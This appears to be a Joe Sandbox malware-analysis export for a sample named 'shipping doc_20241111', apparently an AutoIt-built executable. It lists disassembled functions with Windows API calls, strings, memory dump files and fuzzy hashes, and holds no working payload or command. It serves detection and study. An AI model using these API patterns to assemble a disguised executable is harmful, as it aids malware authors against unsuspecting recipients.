Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: d99b970ea12c7eb5af094b88dd96746e1a9b360bc939b96304664c31b45c9635
Instruction ID: 30b4d1dd0a73578570b1a993ab5fd2c41debd69e725b4c7a1debbd2486abdc5c
Opcode Fuzzy Hash: d99b970ea12c7eb5af094b88dd96746e1a9b360bc939b96304664c31b45c9635
Instruction Fuzzy Hash: 0D51B3B0A0020A9BDF10CF78D984BAEBBF5BF46334F244119E801E7292D7759941EB61

Function 00FAC792 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00FAC831

Strings

stop, xrefs: 00FAC802
blank, xrefs: 00FAC7B3
question, xrefs: 00FAC7EA
info, xrefs: 00FAC7D2
warning, xrefs: 00FAC81A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 5e5c595c2bebbe96f97aba6947c2877d43305cdf178428cc392835dcb072f8f3
Instruction ID: 8875a970fc06f0bc38d1c1b381d901e5633cc1dd57ac21bdf8bbe3b673028f14
Opcode Fuzzy Hash: 5e5c595c2bebbe96f97aba6947c2877d43305cdf178428cc392835dcb072f8f3
Instruction Fuzzy Hash: 8D11EB76A4830B7AE7059B559C82E6B77DCBF17760F20003EF904A5381E7A97D0061E9

Function 00FADD45 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00FADD60
gethostname.WSOCK32(?,00000100), ref: 00FADD7A
gethostbyname.WSOCK32(?), ref: 00FADD87
inet_ntoa.WSOCK32(?), ref: 00FADDC9
_strcat.LIBCMT ref: 00FADDD7
WSACleanup.WSOCK32 ref: 00FADDFC

Strings

0.0.0.0, xrefs: 00FADDA5

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 15b134277f6af9b7e8ba75838206c35f873ac91f652057293f8402605f262ffb
Instruction ID: 081cd79c0f21392233a8ef3aff75277421c2e4d04ab51016a01e8ad788208001
Opcode Fuzzy Hash: 15b134277f6af9b7e8ba75838206c35f873ac91f652057293f8402605f262ffb
Instruction Fuzzy Hash: 9611D6B2940119ABDB24B770DC4AEDE37BCDF42724F04016AF54697491EF749A81FA90

Function 00FAEC37 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00FAEC48
_wcslen.LIBCMT ref: 00FAEC59
_wcslen.LIBCMT ref: 00FAEC97
_wcslen.LIBCMT ref: 00FAECCD
_wcslen.LIBCMT ref: 00FAECFD
_wcslen.LIBCMT ref: 00FAED0D
_wcslen.LIBCMT ref: 00FAED49
_wcslen.LIBCMT ref: 00FAED78

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 36ce67a1723f252206d9ab033b55f43c00c76b13c122c68906657022b48943a8
Instruction ID: b49a4bc56e1840352608eb13040497f6f7bab1a41848d10db592f63fe8b7f1d0
Opcode Fuzzy Hash: 36ce67a1723f252206d9ab033b55f43c00c76b13c122c68906657022b48943a8
Instruction Fuzzy Hash: 1A4161A5D1021476CF11FBF4CC4AACFB7A8AF06310F508466E515E3162FA38E655E3E6

Function 00F5EEF7 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F9EEDF,00000004,00000000,00000000), ref: 00F5EF72
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F9EEDF,00000004,00000000,00000000), ref: 00F9F0EE
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F9EEDF,00000004,00000000,00000000), ref: 00F9F171

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5b6fbbf06e5e6a3bfb3788fabd88d72a2e6279e4419179882702dbf5449a51c8
Instruction ID: d257e99d8c194715bbda7a26402db598d836d0790ad5485b938f1c9248db17c4
Opcode Fuzzy Hash: 5b6fbbf06e5e6a3bfb3788fabd88d72a2e6279e4419179882702dbf5449a51c8
Instruction Fuzzy Hash: 17412B31A0C641ABDB3D8B38CC8876A7BD2AB45322F14451DEA4786561CE36D98CFB51

Function 00FD2C36 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00FD2C4E
GetDC.USER32(00000000), ref: 00FD2C56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FD2C61
ReleaseDC.USER32(00000000,00000000), ref: 00FD2C6D
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00FD2CA9
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FD2CBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FD599A,?,?,000000FF,00000000,?,000000FF,?), ref: 00FD2CF5
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FD2D14

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 4bddc2763edaf05aa1399628df67e48bf91b39688453cf012bb3619075fd6009
Instruction ID: c98b67d8a50c0492cfa25e3d0f203d2654f6eb7a5ea95cb88af62cb3417a0705
Opcode Fuzzy Hash: 4bddc2763edaf05aa1399628df67e48bf91b39688453cf012bb3619075fd6009
Instruction Fuzzy Hash: 0B318072201215BFEB118F20CC49FEB3BAEEF59721F084056FE08DA291D6759C41DBA4

Function 00FA5578 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00FA558D
_memcmp.LIBVCRUNTIME ref: 00FA55AF
_memcmp.LIBVCRUNTIME ref: 00FA55C7
_memcmp.LIBVCRUNTIME ref: 00FA55DA
_memcmp.LIBVCRUNTIME ref: 00FA55F4
_memcmp.LIBVCRUNTIME ref: 00FA5607
_memcmp.LIBVCRUNTIME ref: 00FA561F
_memcmp.LIBVCRUNTIME ref: 00FA563A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 58df94a857634354a602376140f5d81fd393211cdfe80a6681a71b3ba4ab44af
Instruction ID: 7c03ca94906f26c56f6f1700c88f8647096c1530fb946f23c849c8b27d2f5fef
Opcode Fuzzy Hash: 58df94a857634354a602376140f5d81fd393211cdfe80a6681a71b3ba4ab44af
Instruction Fuzzy Hash: BB2198E2E01A057FD60465119E42FAF336EAE06B68B5C0021FD0696742E755EF14F6A1

Function 00FC4ED5 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00FC4F2E
NULL Pointer assignment, xrefs: 00FC4F55, 00FC52AA

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 2ec0939974689267d10f994057d67058f5bcc0aa61bad6e3c1af6966a6207e62
Instruction ID: cf7066b967190e9b1f9cda609b5a5cceeefb7b7841e38bdb92a4425fcb33be36
Opcode Fuzzy Hash: 2ec0939974689267d10f994057d67058f5bcc0aa61bad6e3c1af6966a6207e62
Instruction Fuzzy Hash: 67D19E71A0020B9FDF10CFA8C986FAEB7B5BB48714F14816DE915AB280D770ED85DB90

Function 00F814C2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00F8156E
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F815F1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F81684
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F8169B

Part of subcall function 00F737B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00F5FD75,?,?,00F4B63D,00000000,?,?,?,00FB106C,00FDD0D0,?,00F8242E), ref: 00F737E2

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F81717
__freea.LIBCMT ref: 00F81742
__freea.LIBCMT ref: 00F8174E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 9eb00345635b8ef8ba23f7e2884af7596a367fc6c4deefd375da2cb8f1d7c824
Instruction ID: fec6e9807d6776b589016ae86a58ebcdfa6a3e01aba7873ea0c0461657aac9a0
Opcode Fuzzy Hash: 9eb00345635b8ef8ba23f7e2884af7596a367fc6c4deefd375da2cb8f1d7c824
Instruction Fuzzy Hash: 7C919472E002169ADF20AE64CC41EEE7BB9BF49760F184759E816EB141D735DC42EBA0

Function 00F5A910 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 62229586cafdea10955419a5f347929f9c10bf6a4f10390654abc4c5ba18a896
Instruction ID: 7fa99b9219e522cccbfa2f1de0386ed52d95728989fddb1edcf06b3f16f6f462
Opcode Fuzzy Hash: 62229586cafdea10955419a5f347929f9c10bf6a4f10390654abc4c5ba18a896
Instruction Fuzzy Hash: 5E914871D40219EFCB10CFA8CC84AEEBBB9FF48320F148159E911B7251D379A951EBA0

Function 00FB10A5 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,?), ref: 00FB117A
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00FB11A2
SafeArrayUnaccessData.OLEAUT32(?), ref: 00FB11C6
SafeArrayAccessData.OLEAUT32(?,?), ref: 00FB11F6
SafeArrayAccessData.OLEAUT32(?,?), ref: 00FB127D
SafeArrayAccessData.OLEAUT32(?,?), ref: 00FB12E2
SafeArrayAccessData.OLEAUT32(?,?), ref: 00FB134E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 8766a87201de55889b92cf81afa04050686070be6156f27bde8d23787aa442d7
Instruction ID: 0dee43f217dca3512bb7f580c6924b935e5ad23efe7d958699af0cb5527bd461
Opcode Fuzzy Hash: 8766a87201de55889b92cf81afa04050686070be6156f27bde8d23787aa442d7
Instruction Fuzzy Hash: C491C076A002199FDB019F99C8A4BFE77F9FF45321F144029EA00EB291D778A945EF90

Function 00FC386E Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FC3892
CharUpperBuffW.USER32(?,?), ref: 00FC39A1
_wcslen.LIBCMT ref: 00FC39B1
VariantClear.OLEAUT32(?), ref: 00FC3B46

Part of subcall function 00FB0BFD: VariantInit.OLEAUT32(00000000), ref: 00FB0C3D
Part of subcall function 00FB0BFD: VariantCopy.OLEAUT32(?,?), ref: 00FB0C46
Part of subcall function 00FB0BFD: VariantClear.OLEAUT32(?), ref: 00FB0C52

Strings

AUTOIT.ERROR, xrefs: 00FC39A7, 00FC39AC
Incorrect Parameter format, xrefs: 00FC38CD, 00FC3AC8

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: b1e574dc745c832af19972c7503e4e7f134fb41f1676a2d5493ba2fbf76607d0
Instruction ID: 2a7b53bc9153cb077e9c70aaa0b9ac253909aceb834a82f9cb1699b50c81cdba
Opcode Fuzzy Hash: b1e574dc745c832af19972c7503e4e7f134fb41f1676a2d5493ba2fbf76607d0
Instruction Fuzzy Hash: 0F918D75A043429FC700DF68C581A6ABBE5FF89354F14892DF88987351DB35EE05EB82

Function 00FC4AD4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00F9FEF7: CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,00F9FE2A,80070057), ref: 00F9FF14
Part of subcall function 00F9FEF7: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00F9FE2A,80070057), ref: 00F9FF2F
Part of subcall function 00F9FEF7: lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00F9FE2A,80070057), ref: 00F9FF3D
Part of subcall function 00F9FEF7: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00F9FE2A,80070057), ref: 00F9FF4D

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00FC4B78
_wcslen.LIBCMT ref: 00FC4C80
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00FC4CF6
CoTaskMemFree.OLE32(?), ref: 00FC4D01

Strings

NULL Pointer assignment, xrefs: 00FC4D4A, 00FC4D79

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 532bd15251eefbf565ebd4546f56117f98b75fa334d222ca306b7058003752ae
Instruction ID: e6321b09da01179363ab35bd9dba1835aa82178855ff42292de64f6c63eefaad
Opcode Fuzzy Hash: 532bd15251eefbf565ebd4546f56117f98b75fa334d222ca306b7058003752ae
Instruction Fuzzy Hash: 18912871D012199BDF10DFA4CC91EEEBBB9BF48310F10416AE915A7291EB74AA44DFA0

Function 00FD2030 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00FD20B6
GetMenuItemCount.USER32(00000000), ref: 00FD20E8
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FD2110
_wcslen.LIBCMT ref: 00FD2146
GetMenuItemID.USER32(?,?), ref: 00FD2180
GetSubMenu.USER32(?,?), ref: 00FD218E

Part of subcall function 00FA3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA399F
Part of subcall function 00FA3985: GetCurrentThreadId.KERNEL32 ref: 00FA39A6
Part of subcall function 00FA3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00FA24F7), ref: 00FA39AD

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FD2216

Part of subcall function 00FAE899: Sleep.KERNEL32 ref: 00FAE911

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 56b8ca4d42f329dce580bce8f18549ea76242804dc88196aa9c4400899cf05fa
Instruction ID: 226b2e2372c094675f6bd0e38dc0593fda396b594c04f2bf4097240b8fa4f0b5
Opcode Fuzzy Hash: 56b8ca4d42f329dce580bce8f18549ea76242804dc88196aa9c4400899cf05fa
Instruction Fuzzy Hash: 20718475E00205AFCB40EF64C845AAEBBF6EF59320F18845AE915EB341D735AD41EBD0

Function 00FD7D90 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01245620), ref: 00FD7E29
IsWindowEnabled.USER32(01245620), ref: 00FD7E35
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00FD7F10
SendMessageW.USER32(01245620,000000B0,?,?), ref: 00FD7F43
IsDlgButtonChecked.USER32(?,?), ref: 00FD7F7B
GetWindowLongW.USER32(01245620,000000EC), ref: 00FD7F9D
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00FD7FB5

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: c62e3558e3b2c946b4004f76663941b59217a88871696aeb9c2788a40a68ce05
Instruction ID: 7cb79cd3fd96958821f0c23839e3b24adec85a0f7bf951cbb30999b78b00ff98
Opcode Fuzzy Hash: c62e3558e3b2c946b4004f76663941b59217a88871696aeb9c2788a40a68ce05
Instruction Fuzzy Hash: 76719235A08305AFEB21AF64C894FAA7BB7EF09310F18449BE9559B351E731AD40EB50

Function 00FAADD8 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00FAAE17
GetKeyboardState.USER32(?), ref: 00FAAE2C
SetKeyboardState.USER32(?), ref: 00FAAE8D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00FAAEBB
PostMessageW.USER32(?,00000101,00000011,?), ref: 00FAAEDA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00FAAF1B
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FAAF3E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d5887fba38f62c4547846ef4d20e2b4af81bff071b0fc2b4fe99cb509edface3
Instruction ID: 24a7704b644de3c018c688f03d3c96cce5c40ddb97e06d05c336bd3134c7ca52
Opcode Fuzzy Hash: d5887fba38f62c4547846ef4d20e2b4af81bff071b0fc2b4fe99cb509edface3
Instruction Fuzzy Hash: 9E51A0E0A047D53DFB364234CC55BBABEA95B07310F088589F1D9554C2D798AC98F792

Function 00FAABF8 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00FAAC37
GetKeyboardState.USER32(?), ref: 00FAAC4C
SetKeyboardState.USER32(?), ref: 00FAACAD
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FAACD9
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FAACF6
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FAAD35
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FAAD56

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

